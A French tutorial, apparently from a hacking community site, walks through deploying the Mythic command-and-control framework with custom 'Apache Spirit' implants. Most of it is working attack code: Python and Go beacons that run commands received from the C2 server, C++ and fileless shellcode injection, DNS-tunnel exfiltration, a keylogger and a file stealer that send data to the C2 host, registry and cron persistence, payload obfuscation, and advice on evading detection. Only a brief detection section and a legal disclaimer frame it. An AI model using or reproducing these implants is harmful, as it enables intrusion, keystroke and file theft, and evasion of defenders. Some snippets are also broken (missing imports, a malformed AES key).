⚖️ Charte Éthique Apache
Yo, Apache membre ! Voici Mythic 2025, par Platon-y pour pctamalou.fr. Ce tuto déploie un C2 Mythic avec payloads furtifs (Python, C++, Go, DNS Tunneling), Process Hollowing, injection sans fichier, C2 chiffrés, monitoring Flask, et OPSEC avancée en lab éthique. Lab uniquement – interdiction d’attaquer des systèmes réels sans autorisation (article 323-1 Code pénal : 7 ans prison, 100 000 € amende). Sensibilisation à la sécurité, pas d’usage illégal ! Hackez propre !
Mythic 2025 🐉💾
Exclusivité membres : déployez Mythic, un C2 open-source, avec payloads “Apache Spirit” furtifs (Python, C++, Go, DNS Tunneling), Process Hollowing, injection sans fichier, C2 chiffrés (HTTP/S, DNS), monitoring Flask, et OPSEC avancée en lab éthique. Simulez une attaque APT et devenez une légende Red Team ! 100% éthique ! ⚡️
1️⃣ Introduction à Mythic 🐉
Mythic est un framework C2 open-source (Python, Go, Docker) pour Red Teams, avec une UI web React et des agents plug-and-play (Apollo, Athena). Ce tuto simule une attaque APT en lab avec payloads avancés (Python, C++, Go, DNS Tunneling), Process Hollowing, injection sans fichier, C2 chiffrés, monitoring Flask, et OPSEC. Lab-only, pas d’attaques réelles.
Objectifs
- Installer Mythic sur Kali 2024.4 avec script automatisé.
- Configurer un C2 avec redirecteurs Nginx.
- Générer payloads furtifs (Python, C++, Go, DNS).
- Implémenter Process Hollowing et injection sans fichier.
- Établir persistance, keylogging, exfil.
- Monitorer via Flask et RabbitMQ.
- Maîtriser OPSEC (IOC, chiffrement, rétro-ingénierie).
2️⃣ Setup du Lab 🔧
Configurez un lab isolé.
+-----------------------------------------+
| [Réseau Lab Isolé] |
| | |
| v |
| [Kali Linux: 172.16.0.101] |
| | (C2 Server, Attacker) |
| v |
| [Target: 172.16.0.102] |
| (Windows 10/Ubuntu 20.04 VM) |
+-----------------------------------------+
Variables
# ~/.bashrc
export KALI_IP=172.16.0.101
export TARGET_IP=172.16.0.102
export C2_PORT=7443
export LHOST=172.16.0.101
export LPORT=4444
export MYTHIC_ADMIN_PASSWORD=ApacheSpirit2025
source ~/.bashrc
Matériel & Logiciels
| Composant | Description | Prix (approx.) |
|---|---|---|
| PC | VirtualBox, Kali 2024.4 VM | - |
| Réseau | VirtualBox NAT Network | - |
| Logiciels | Python 3.12, Docker, Nginx, Flask, Go, g++, PyArmor | Gratuit |
| Raspberry Pi (optionnel) | Lab nomade | 60 € |
Configuration
# Kali
sudo ifconfig eth0 $KALI_IP netmask 255.255.255.0 up
sudo apt update && sudo apt install -y docker.io docker-compose python3-pip nginx git golang g++ ngrok
pip3 install flask flask-socketio requests pika pycryptodome pyarmor
# Cible (Ubuntu)
sudo ifconfig eth0 $TARGET_IP netmask 255.255.255.0 up
# Cible (Windows)
netsh interface ip set address name="Ethernet" static $TARGET_IP 255.255.255.0
3️⃣ Installation de Mythic 🛠️
Installez Mythic via un script automatisé.
# auto_install_mythic.sh #!/bin/bash KALI_IP="172.16.0.101" MYTHIC_PASS="ApacheSpirit2025$(date +%s | sha256sum | base64 | head -c 16)" echo "[+] Configuring Kali Linux..." sudo apt update && sudo apt full-upgrade -y sudo apt install -y docker.io docker-compose nginx python3-pip git certbot python3-certbot-nginx golang g++ ngrok pip3 install flask flask-socketio requests pika pycryptodome pyarmor echo "[+] Deploying Mythic..." git clone https://github.com/its-a-feature/Mythic /opt/mythic cd /opt/mythic sudo ./install_docker_ubuntu.sh echo "MYTHIC_ADMIN_PASSWORD=$MYTHIC_PASS" >> .env sudo make echo "[+] Setting up Nginx redirector..." cat </etc/nginx/sites-available/mythic server { listen 443 ssl; server_name c2.apache.local; ssl_certificate /etc/letsencrypt/live/c2.apache.local/fullchain.pem; ssl_certificate_key /etc/letsencrypt/live/c2.apache.local/privkey.pem; location / { proxy_pass https://$KALI_IP:7443; proxy_ssl_verify off; } } EOF sudo ln -s /etc/nginx/sites-available/mythic /etc/nginx/sites-enabled/ sudo certbot --nginx -d c2.apache.local --non-interactive --agree-tos -m admin@pctamalou.fr sudo systemctl restart nginx echo "[+] C2 configured at:" echo " URL: https://$KALI_IP:7443" echo " Password: $MYTHIC_PASS"
# Exécuter
chmod +x auto_install_mythic.sh
sudo ./auto_install_mythic.sh
# Accéder UI
https://$KALI_IP:7443 (admin/$MYTHIC_ADMIN_PASSWORD)
4️⃣ Payload Apache Spirit 🐍💉
Générez des payloads furtifs “Plug & Play”.
Payload Basique: Apache Spirit Lite (Python)
# apache_spirit_lite.py
import requests
import subprocess
import base64
import time
import random
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
C2_URL = "https://c2.apache.local:7443"
USER_AGENT = "ApacheSpirit/1.0"
SLEEP_MIN = 30
SLEEP_MAX = 90
KEY = b"ApacheSpirit2025!"
IV = b"1234567890123456"
def aes_encrypt(data):
cipher = AES.new(KEY, AES.MODE_CBC, IV)
return base64.b64encode(cipher.encrypt(pad(data.encode(), AES.block_size))).decode()
def beacon():
while True:
try:
r = requests.post(
f"{C2_URL}/tasks",
headers={"User-Agent": USER_AGENT},
json={"hostname": "TARGET-01", "platform": "linux"}
)
task = r.json().get("task")
if task:
output = subprocess.getoutput(task["command"])
encrypted = aes_encrypt(output)
requests.post(
f"{C2_URL}/results",
headers={"User-Agent": USER_AGENT},
json={"task_id": task["id"], "output": encrypted}
)
except:
pass
time.sleep(random.randint(SLEEP_MIN, SLEEP_MAX))
beacon()
Obfuscation
# Obfusquer
pyarmor obfuscate --recursive apache_spirit_lite.py
# Sauvegarder
mv dist/apache_spirit_lite.py /tmp/apache_spirit_lite_obf.py
Payload Furtif: C++ (Process Hollowing)
// apache_spirit.cpp #include#include void inject_shellcode(BYTE* shellcode, SIZE_T size) { STARTUPINFOA si = {0}; PROCESS_INFORMATION pi = {0}; CreateProcessA("C:\\Windows\\explorer.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi); LPVOID mem = VirtualAllocEx(pi.hProcess, NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); WriteProcessMemory(pi.hProcess, mem, shellcode, size, NULL); QueueUserAPC((PAPCFUNC)mem, pi.hThread, (ULONG_PTR)mem); ResumeThread(pi.hThread); } int main() { unsigned char shellcode[] = {0x90, 0x90, 0xCC}; // Remplacer par Mythic shellcode inject_shellcode(shellcode, sizeof(shellcode)); return 0; }
# Compiler
x86_64-w64-mingw32-g++ apache_spirit.cpp -o /tmp/apache_spirit.exe -static -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -Wl,--gc-sections
Payload DNS Tunneling (Python)
# dns_tunnel.py
import dns.resolver
def exfiltrate(data):
encoded = data.encode().hex()
subdomains = [encoded[i:i+32] for i in range(0, len(encoded), 32)]
for sub in subdomains:
try:
dns.resolver.resolve(f"{sub}.c2.apache.local", "A")
except:
pass
exfiltrate("Données sensibles à exfiltrer")
Payload Go
// apache_spirit.go
package main
import (
"bytes"
"encoding/json"
"net/http"
"time"
)
func connectC2() {
client := &http.Client{
Transport: &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true}},
}
data, _ := json.Marshal(map[string]string{"id": "apache1"})
req, _ := http.NewRequest("POST", "https://c2.apache.local:7443/checkin", bytes.NewBuffer(data))
req.Header.Set("User-Agent", "ApacheSpirit")
resp, _ := client.Do(req)
defer resp.Body.Close()
body, _ := ioutil.ReadAll(resp.Body)
exec.Command("cmd", "/c", string(body)).Run()
}
func main() {
for {
connectC2()
time.Sleep(60 * time.Second)
}
}
# Compiler
GOOS=windows GOARCH=amd64 go build -o /tmp/apache_spirit_go.exe apache_spirit.go
Injection Mémoire Sans Fichier
# advanced_injection.py
import ctypes
import base64
def inject_shellcode(sc):
sc = base64.b64decode(sc)
ptr = ctypes.windll.kernel32.VirtualAlloc(0, len(sc), 0x1000, 0x40)
buf = (ctypes.c_char * len(sc)).from_buffer(sc)
ctypes.windll.kernel32.RtlMoveMemory(ptr, buf, len(sc))
ht = ctypes.windll.kernel32.CreateThread(0, 0, ptr, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(ht, -1)
shellcode = "BASE64_ENCODED_SHELLCODE" # Remplacer
inject_shellcode(shellcode)
Chiffrement AES
# aes_encrypt.py
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
import base64
KEY = b"ApacheSpirit2025!"
IV = b"1234567890123456"
def encrypt(data):
cipher = AES.new(KEY, AES.MODE_CBC, IV)
return base64.b64encode(cipher.encrypt(pad(data.encode(), AES.block_size)))
def decrypt(data):
cipher = AES.new(KEY, AES.MODE_CBC, IV)
return unpad(cipher.decrypt(base64.b64decode(data)), AES.block_size).decode()
Transfert
# Linux (Python)
scp /tmp/apache_spirit_lite_obf.py user@$TARGET_IP:/tmp/
# Windows (C++/Go)
python3 -m http.server 8000
powershell -c "Invoke-WebRequest -Uri http://$KALI_IP:8000/apache_spirit.exe -OutFile C:\Temp\apache_spirit.exe"
Debugging
# Ngrok
ngrok http 7443
# Remplacer C2_URL par l'URL ngrok
# Analyse
# Windows
# Sysinternals: procexp.exe, procmon.exe
# Linux
strace -p $(pidof python3)
# VirusTotal
# Upload /tmp/apache_spirit_lite_obf.py
5️⃣ Serveur C2 🔗
Configurez un profil C2 HTTP/S.
# UI Mythic -> C2 Profiles
# - Profile: HTTP
# - Host: https://c2.apache.local:7443
# - User-Agent: ApacheSpirit
# - Callback Interval: 60s
# Sauvegarder & Activer
DNS Tunneling
# UI Mythic -> C2 Profiles
# - Profile: DNS
# - Domain: c2.apache.local
# - Subdomain: apache
6️⃣ Persistance 🔄
Windows
# UI Mythic -> Tasks
# - Command: persist_registry
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ApacheSpirit /t REG_SZ /d "C:\Temp\apache_spirit.exe" /f
Linux
# UI Mythic -> Tasks
# - Command: persist_cron
echo "@reboot python3 /tmp/apache_spirit_lite_obf.py" | crontab -
7️⃣ Exfiltration & Keylogging 💥
Keylogging
# keylogger.py (Custom Apollo Task)
import keyboard
import requests
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
KEY = b"ApacheSpirit2025!"
IV = b"1234567890123456"
def encrypt(data):
cipher = AES.new(KEY, AES.MODE_CBC, IV)
return base64.b64encode(cipher.encrypt(pad(data.encode(), AES.block_size))).decode()
def keylogger():
log = ""
while True:
event = keyboard.read_event()
if event.event_type == keyboard.KEY_DOWN:
log += event.name
if len(log) > 100:
encrypted = encrypt(log)
requests.post('https://c2.apache.local:7443/exfil', json={'id': 'apache1', 'keys': encrypted})
log = ""
keylogger()
Exfiltration Fichiers
# exfil.py (Custom Apollo Task)
import requests
import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
KEY = b"ApacheSpirit2025!"
IV = b"1234567890123456"
def encrypt(data):
cipher = AES.new(KEY, AES.MODE_CBC, IV)
return base64.b64encode(cipher.encrypt(pad(data, AES.block_size)))
def exfil_file(path):
with open(path, 'rb') as f:
data = encrypt(f.read())
requests.post('https://c2.apache.local:7443/exfil', json={'id': 'apache1', 'file': data.decode(), 'path': path})
exfil_file('/etc/passwd')
8️⃣ Monitoring 📊
Dashboard Flask pour logs Mythic.
# dashboard.py
from flask import Flask, render_template
from flask_socketio import SocketIO
import pika
import json
app = Flask(__name__)
socketio = SocketIO(app)
def mythic_logs():
connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))
channel = connection.channel()
channel.queue_declare(queue='mythic_logs')
for method, properties, body in channel.consume('mythic_logs', inactivity_timeout=1):
if body:
socketio.emit('log', {'data': json.loads(body.decode())})
else:
break
connection.close()
@app.route('/')
def dashboard():
return render_template('dashboard.html')
if __name__ == '__main__':
socketio.start_background_task(mythic_logs)
socketio.run(app, host='0.0.0.0', port=80)
Mythic Dashboard
Mythic 2025: Apache Control
# Lancer
sudo python3 dashboard.py
# Accéder
http://$KALI_IP:80
9️⃣ Sécurité Opérationnelle 🕵️
IOC à Éviter
- Fichiers: /tmp/apache_spirit_lite_obf.py, C:\Temp\apache_spirit.exe.
- Réseau: Trafic vers c2.apache.local:7443, requêtes DNS *.c2.apache.local.
- Processus: python3, explorer.exe suspect.
- Registres: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ApacheSpirit.
Chiffrement Personnalisé (XOR + AES)
# custom_encrypt.py
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
import base64
def xor_encrypt(data, key):
return ''.join(chr(ord(c) ^ ord(key[i % len(key)])) for i, c in enumerate(data))
def aes_encrypt(data, key):
cipher = AES.new(key.ljust(16)[:16].encode(), AES.MODE_GCM)
nonce = cipher.nonce
ciphertext, tag = cipher.encrypt_and_digest(data.encode())
return base64.b64encode(nonce + tag + ciphertext).decode()
def encrypt_payload():
with open('/tmp/apache_spirit_lite.py', 'r') as f:
code = f.read()
xor_key = "Apache2025"
aes_key = "ApacheSpirit2025"
xored = xor_encrypt(code, xor_key)
encrypted = aes_encrypt(xored, aes_key)
with open('/tmp/apache_spirit_enc.py', 'w') as f:
f.write(f"import base64;exec(base64.b64decode('{encrypted}'))")
encrypt_payload()
Rétro-ingénierie C2
- Analyse: Wireshark sur HTTPS (certificat c2.apache.local).
- Mitigation: Randomiser User-Agent, varier intervalles.
- Simulation: Décoder trafic avec clé volée.
# analyze_c2.py
import scapy.all as scapy
def analyze_c2():
packets = scapy.sniff(filter="tcp port 7443 or udp port 53", count=100)
for pkt in packets:
if pkt.haslayer(scapy.Raw):
print(pkt[scapy.Raw].load)
analyze_c2()
🔟 Sécurisation 🛡️
Protégez contre Mythic.
- Détection: Surveillez $LHOST:7443, processus Python/C++, requêtes DNS.
- Suppression: Kill processus, supprimez payloads.
- Prévention: Firewall, EDR, patchs.
# Détection
netstat -tuln | grep 7443
ps aux | grep python
dig +short *.c2.apache.local
# Suppression (Linux)
kill -9 $(pidof python3 /tmp/apache_spirit_lite_obf.py)
rm /tmp/apache_spirit_lite_obf.py
# Suppression (Windows)
taskkill /IM apache_spirit.exe /F
del C:\Temp\apache_spirit.exe
1️⃣1️⃣ Rapport Pro 📊
## Rapport de Test Mythic
- **Cible**: $TARGET_IP
- **Durée**: 2h
- **Résultat**: Session C2 établie, exfil réussie
- **OS**: [Windows/Linux]
- **Recommandations**:
- Surveiller trafic réseau
- Mettre à jour EDR
- Segmenter réseau
- Former utilisateurs
❓ FAQ Apache 🔥
Q: Puis-je tester en prod ?
A: Non, lab-only avec autorisation écrite.
Q: Payload ne se connecte pas ?
A: Vérifiez $LHOST, $C2_PORT, firewall, DNS.
Q: Détecter Mythic ?
A: Surveillez trafic, processus, logs, DNS.